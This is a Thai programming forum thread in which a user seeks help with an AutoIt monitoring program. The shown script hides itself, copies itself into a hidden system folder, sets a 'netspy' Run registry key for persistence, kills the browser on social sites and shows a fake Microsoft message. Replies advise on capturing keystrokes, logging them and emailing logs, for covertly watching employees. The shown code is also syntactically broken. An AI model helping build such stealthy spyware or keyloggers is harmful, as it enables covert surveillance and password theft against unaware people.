ฟอรั่ม PSsix

Would you like to react to this message? Create an account in a few clicks or log in to continue.

ฟอรั่มของบล็อก http://pssix.blogspot.com

3 posters

ช่วยดูโค้ดให้หน่อยครับ

Monaliza
    Monaliza
    PSsix Member Super Class III

PSsix Program Coder
    ความนิยม : 7
    เข้าร่วมเมื่อ : 03/10/2010

ช่วยดูโค้ดให้หน่อยครับ Empty ช่วยดูโค้ดให้หน่อยครับ

ตั้งหัวข้อ by Monaliza 08/11/10, 09:35 pm

เพิ่งเขียนเสร็จครับ ช่วยตรวจดูให้หน่อยว่ามีข้อผิดผลาดตรงไหน
    เมื่อใช้ไปนานๆจะเกิดerrorไหม

#include<Misc.au3>

#NoTrayIcon

_Singleton(@ScriptName, 0)

While 1
    sleep(1000)
    DirCreate("c:\photo1")
    fileCopy("test01.exe","c:\photo1")
    FileSetAttrib("c:\photo1","RS")
    FileSetAttrib("c:\photo1\test01.exe","RS")
    RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run","netspy","Reg_sz","c:\photo1\test01.exe")

If WinExists("hi5") Then
    do
    ProcessClose("iexplore.exe")
    UNTIL ProcessExists("iexplore.exe")=0
    MsgBox(0,"Microsoft","Microsoft Internet Explorer To Administrator unblock [You must be registered and logged in to see this link.]
    EndIf

If WinExists("Welcome to Facebook") Then
    do
    UNTIL ProcessExists("iexplore.exe")=0
    MsgBox(0,"Microsoft","Microsoft Internet Explorer To Administrator unblock [You must be registered and logged in to see this link.]
    EndIf

If WinExists("LiveScore.com") Then
    do
    EndIf

If WinExists("Twitter") Then
    do
    EndIf

sleep(15000)
    WEnd

เป็นโปรแกรมตรวจสอบว่าเข้าเว็บที่ระบุไว้หรือไม่ถ้าเป็นจะปิด ie แล้วแสดงข้อความทำงานทุก15วินาที
    Monaliza
    Monaliza

ช่วยดูโค้ดให้หน่อยครับ Empty Re: ช่วยดูโค้ดให้หน่อยครับ

ตั้งหัวข้อ by Monaliza 09/11/10, 01:22 am

ตามด้วยโค้ดเจ้าปัญหาครับพอทำงานไปซัก4-5วันก็จะออกerrorนี้ขนาดไม่ได้ใส่ฟั่งชั่นโหดๆเข้าไป
    กินแรม มั่กๆ ครับช่วยดูให้หน่อยนะครับ
    ว่ามันมีข้อผิดผลาดตรงไหนตอนนี้ผมยังก้าวข้ามจุดนี้ไปไม่ได้
    ปล.จะลบโค้ดออกไปเลยก็ได้นะครับเพราะโค้ดนี้ค่อนข้างอันตรายถ้าเอาไปดัดแปลงแก้ไขเอาไปใช้ในทางที่ไม่ถูกต้อง

--------ลบ------------
    sirchet
    sirchet
    PSsix Member High Class

ความนิยม : 1
    เข้าร่วมเมื่อ : 21/07/2010

ช่วยดูโค้ดให้หน่อยครับ Empty Re: ช่วยดูโค้ดให้หน่อยครับ

ตั้งหัวข้อ by sirchet 10/11/10, 12:14 am

ท่านเล่นของอันตรายเลยนะครับเนี่ย ผมคิดว่าท่าน POS ไม่น่าอนุญาต ให้ตั้งกระทู้โปรแกรมประเภทนี้ นะครับเพราะเป็นบอร์ดสาธารณะ แต่ผมขอแนะนำนิดนึงนะครับ จะไม่เขียนให้ดู โปรแกรมยังไม่น่าจะคลอบคลุม การกด shift ค้าง และ Caplock และ ปุ่มเปลียนภาษานะครับ แล้วก็ควรหน่วงเวลา ซัก 10 มิลลิวินาที ครับเพื่อให้ CPU ทำงานไม่หนักเกินไป
    Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 10/11/10, 01:17 am

ครับเป็นแค่ต้นฉบับครับ ผมใส่แค่ If _IsPressed("10", $dll).... ("10")ในautoitหมายถึงการกด shift นะครับส่วนCaplock และ ปุ่มเปลียนภาษาผมยังไม่ได้ใส่ฟั่งชั่นนี้เข้าไปเพราะว่าเป็นแค่ต้นฉบับคุณ sirchetว่าโครงสร้างโปรแกรมมันมั่วๆไหมครับผมว่ามันยังมั่วๆอยู่นะครับรบกวน
    คุณPOSลบโค้ดนี้ทิ้งไปเลยครับต่อไปผมจะไม่ตั้งกระทู้มั่วซั่วอีกแล้ว
    อีกนิดครับ
    10 มิลลิวินาที นี้หมายถึง sleep(10)หรือว่าsleep(100)ครับถ้าเป็น
    sleep(10)นี้ยิ่งทำให้CPU ทำงานหนักกว่าsleep(50)ไม่ใช้เหรอครับหรือว่าผมเข้าใจอะไรผิดขอบคุณครับที่ให้คำแนะนำ

POS
    POS
    PSsix
    PSsix

ช่วยดูโค้ดให้หน่อยครับ Empty ช่วยดูโค้ดให้หน่อยครับ Empty ช่วยดูโค้ดให้หน่อยครับ Empty
    ความนิยม : 326
    เข้าร่วมเมื่อ : 19/07/2010

ตั้งหัวข้อ by POS 10/11/10, 02:06 am

- เปลี่ยนเป็นเขียนเก็บลงตัวแปรแทนเขียนลงไฟล์ พอเก็บครบ 50 หรือมากกว่านี้ค่อยเขียนลงไฟล์
    - บันทึกเป็นไฟล์ใหม่ทุกครั้งที่มีการเปิดโปรแกรมทำงาน ใช้พวก @MDAY กับ @HOUR ชื่อไฟล์ก็ไม่ซ้ำกันแล้ว
    - sleep 10 cpu ทำงานหนักกว่า sleep 50 ยิ่งเวลา sleep มากก็เหมือนการหยุดพักนานขึ้น

หมายเหตุ
    โค้ดไม่มีประสิทธิภาพตั้งแต่ต้นแล้วครับ ทำให้ตัวโค้ดค่อนข้างยาวแล้วก็เสียเวลาประมวลผล ศึกษาเรื่อง WinAPI ให้ชำนาญแล้วจะพบทางแก้ไขโค้ดให้ดีขึ้น(ศึกษาเอาเองจาก Help)
    Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 11/11/10, 01:10 am

คุณ POS เขียนว่า
    "เปลี่ยนเป็นเขียนเก็บลงตัวแปรแทนเขียนลงไฟล์ "
    ..........................................................
    ระบุให้เก็บค่าลงตัวแปรก่อน แล้วต้องกำหนดให้$xxx=อะไรครับนึกไม่ออก
    "พอเก็บครบ 50 หรือมากกว่านี้ค่อยเขียนลงไฟล์"
    ตรงนี้พอทำได้

"บันทึกเป็นไฟล์ใหม่ทุกครั้งที่มีการเปิดโปรแกรมทำงาน ใช้พวก @MDAY กับ @HOUR ชื่อไฟล์ก็ไม่ซ้ำกันแล้ว"
    ชื่อไฟล์ซ้ำกันทุกครั้งที่เปิดโปรแกรมเป็นส่วนหนึ่งของการerrorเมื่อใช้ไปนาน ๆใช้ไหมครับ
    sirchet
    sirchet

ความนิยม : 1
    เข้าร่วมเมื่อ : 21/07/2010

ตั้งหัวข้อ by sirchet 11/11/10, 07:03 am

Monaliza พิมพ์ว่า:ครับเป็นแค่ต้นฉบับครับ ผมใส่แค่ If _IsPressed("10", $dll).... ("10")ในautoitหมายถึงการกด shift นะครับส่วนCaplock และ ปุ่มเปลียนภาษาผมยังไม่ได้ใส่ฟั่งชั่นนี้เข้าไปเพราะว่าเป็นแค่ต้นฉบับคุณ sirchetว่าโครงสร้างโปรแกรมมันมั่วๆไหมครับผมว่ามันยังมั่วๆอยู่นะครับรบกวน
    คุณPOSลบโค้ดนี้ทิ้งไปเลยครับต่อไปผมจะไม่ตั้งกระทู้มั่วซั่วอีกแล้ว
    อีกนิดครับ
    10 มิลลิวินาที นี้หมายถึง sleep(10)หรือว่าsleep(100)ครับถ้าเป็น
    sleep(10)นี้ยิ่งทำให้CPU ทำงานหนักกว่าsleep(50)ไม่ใช้เหรอครับหรือว่าผมเข้าใจอะไรผิดขอบคุณครับที่ให้คำแนะนำ

โทดทีครับผมลืมดูไปว่ามี sleep(50) อยู่แลัว ท่านสามารถศึกษาโปรแกรมอันนี้ได้จากเวปต่างประเทศนะครับ ส่วนเวปของ Autoit เองจะไม่มี เพราะเค้ามีกฏห้ามโพสโปรแกรมพวกนี้ ผมเองก็เคยศึกษาอยู่ช่วงหนึ่ง ดักแล้วยังไม่พอส่งเมลกลับมาหาเราทุกชัวโมงได้อีก ชัวร้ายมาก แต่ก็ไม่กล้าใช้กับใครครับเพราะมันอันตรายมาก สงสารเค้า
    POS
    POS
    PSsix
    PSsix

ช่วยดูโค้ดให้หน่อยครับ Empty ช่วยดูโค้ดให้หน่อยครับ Empty ช่วยดูโค้ดให้หน่อยครับ Empty

ตั้งหัวข้อ by POS 11/11/10, 02:56 pm

ก็สร้างตัวแปรขึ้นมาเก็บครับแล้วบวกข้อความไปเรื่อยๆ

$a = $a&"ตัวอักษร"

ตัวอย่าง

Code:
    $a =  "a"
    $a = $a &"b"
    $a = $a &"c"

ปล.
    การกระทำทุกอย่างย่อมมีผลตามมาเสมอ ไม่ได้เกี่ยวกับเรื่องบุญกรรมอะไรทั้งนั้น

อย่างถ้าคุณเป็นเจ้าของร้านเน็ตไปทำโปรแกรมบันทึกการกดปุ่มคีย์บอร์ดเพื่อขโมยรหัสผ่าน ลูกค้ารู้ หรือแม้ไม่รู้แต่พอมาเล่นที่ร้านแล้วโดนแฮคประจำ คนก็บอกต่อกันไป สุดท้ายคนก็หนีหมด ร้านเจ้ง หรือเป็นเจ้าหน้าที่ไปทำอะไรในลักษณะนี้แล้วโดนคนจับได้ สุดท้ายเรื่องแดงก็เสียประวัติ โดนลงโทษอะไรก็แล้วแต่ ถ้าเป็นราชการอาจโดนเกลีดทั้งแผนก แป๊กไม่ได้เลื่อนขั้น โดนแกล้งคืน กรีดรถ วานคนมาดักตีหัว (ผู้คนส่วนใหญ่มักไม่ทนทานต่อการถูกกระทำ เมื่อรู้ตัวว่าถูกกระทำมักจะพยายามแก้แค้นคืนให้หนักกว่าที่โดนหลายเท่า) เหล่านี้เป็นผลที่เกิดจากเหตุทั้งสิ้น

บทเรียนชีวิตบางอย่าง บางครั้งก็ไม่คุ้มที่จะแลกมา พิจารณากันเอาเอง

Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 11/11/10, 05:45 pm

โอ้โห้กลายเป็นเรื่องราวใหญ่โตเลย
    ผมไม่ได้คิดจะเอาไปดักใครเลยครับผมเป็นแค่เจ้าของร้านมินิมาร์เล็ก ๆ
    มีพนักงาน2คนชอบแอบใช้คอมไปเล่นnetโหลดนั้นโหลดนี้เล่นเกมมั้งที่ทำ
    โปรแกรมนี้ขึ้นมาจะเอาไว้ตรวจสอบว่าแอบทำไรกับคอมมั้งเวลาทำงาน(เฉพาะตอนกลางคืน)
    เวลาผมไม่ได้อยู่ ร้านจะใช้โปรแกรมที่หาได้ตามgoogleก็ไม่ไว้ใจ
    กลัวติดไวรัสเพราะในคอมมีข้อมูลเกี่ยวกับสินค้าเยอะมาก
    ก็เลยคิดว่าไหนๆก็จำเป็นต้องใช้ "เขียนขึ้นมาใช้เองเลยดีกว่า"แต่
    ด้วยความที่เป็นมือใหม่ในautoit ก็เลยออกมาได้เท่าที่เห็น
    ก็อย่างที่คุณ POSว่าล่ะครับโค้ดไม่มีประสิทธิภาพเวลารันทิ้งไว้นานๆ
    ก็เลยออกerrorตลอด
    ต้องหาวิธีปรับปรุงอยู่เรื่อยๆ
    โปรแกรมนี้สำหรับผมถือว่ายากครับขอบคุณครับ
    POS
    POS
    PSsix
    PSsix

ตั้งหัวข้อ by POS 11/11/10, 07:02 pm

แค่พูดรวมๆ เท่านั้นครับ เพราะฟอรั่มค่อนข้างจะเปิดกว้าง ดูเหมือนมีคนเขียนอ่านอยู่ไม่กี่คน แต่จริงๆ แล้วคนที่เข้ามาอ่านค่อนข้างเยอะพอสมควร ข้อมูลต่างๆ อาจถูกนำไปใช้ในทางที่ผิด ก็อย่างที่บอกไว้ข้างต้น การกระทำทุกอย่างย่อมมีผลตามมาเสมอ

ผมแค่กระตุ้นเตือนให้ใครก็ตามที่เข้ามาอ่าน ระวังต่อสิ่งที่จะทำเอาไว้เท่านั้น ส่วนอื่นๆ ขอละไว้ไม่ยุ่งเกี่ยว
    Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 16/11/10, 05:14 am

แก้ยังไงก็ยังไม่ได้ครับติดerrorเมื่อใช้ไปนานๆอาการหน่วยความจำเต็ม
    คุณ POS ในการเขียนโปรแกรมลักษณะแบบนี้ใช้การกำหนดเงื่อนไขแบบไหนดีครับระหว่าง
    IF THEN ELSE ENDIF
    กับ Select...Case...EndSelect
    หรือว่าใช้ทั้งสองอย่างผสมกัน

"เปลี่ยนเป็นเขียนเก็บลงตัวแปรแทนเขียนลงไฟล์ พอเก็บครบ 50 หรือมากกว่านี้ค่อยเขียนลงไฟล์"
    ไม่สามารถทำได้ครับเพราะผิดหลักการของโปรแกรมประเภทนี้ครับคงต้องหาวิธีอื่นแทน

ชื่อไฟล์ซ้ำกันทุกครั้งที่เปิดโปรแกรมเป็นส่วนหนึ่งของการerrorเมื่อใช้ไปนาน ๆใช้ไหมครับ
    กำลังปวดหัวมาก ๆ เลยครับ

Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 17/11/10, 02:03 am

ช่วยดูหน่วยครับว่าเขียนโครงสร้างโปรแกรมแบบนี้เวลาใช้ไปนาน ๆจะเกิดปัญหา errorไหมครับ
    Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 07/05/11, 02:38 pm

ขอบคุณครับ[/quote]
    Monaliza
    Monaliza

ตั้งหัวข้อ by Monaliza 07/05/11, 02:40 pm

[quote="Monaliza"]ช่วยดูหน่วยครับว่าเขียนโครงสร้างโปรแกรมแบบนี้เวลาใช้ไปนาน ๆจะเกิดปัญหา errorไหมครับ
    #

เวลาขณะนี้ 02/05/24, 07:03 pm